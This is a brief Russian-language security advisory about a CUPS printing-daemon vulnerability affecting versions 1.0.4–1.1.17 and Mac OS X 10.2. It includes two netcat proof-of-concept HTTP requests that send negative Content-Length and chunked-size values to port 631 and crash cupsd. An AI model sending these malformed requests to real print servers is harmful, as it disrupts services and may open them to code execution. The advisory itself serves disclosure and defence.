Cups (Common Unix Printing System) - свободно доступный пакет для управления принтером от Cups Project для Unix и Linux платформ. 

Обнаруженная в CUPS уязвимость позволяет удаленному атакующему выполнять произвольный код на уязвимой системе. Нападающий может эксплуатировать эту уязвимость соединяясь с уязвимой системой и передавая уродливые HTTP заголовки с отрицательным значением для некоторых полей. Когда cupsd получит этот запрос, его работа аварийно завершится. Пример: 

$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Content-Length: -1 

$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Transfer-Encoding: chunked 

- - - - -FFFFFFFE 

Уязвимость обнаружена в Easy Software Products CUPS 1.0.4-1.1.17 Apple MacOS X 10.2-10.2.2.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии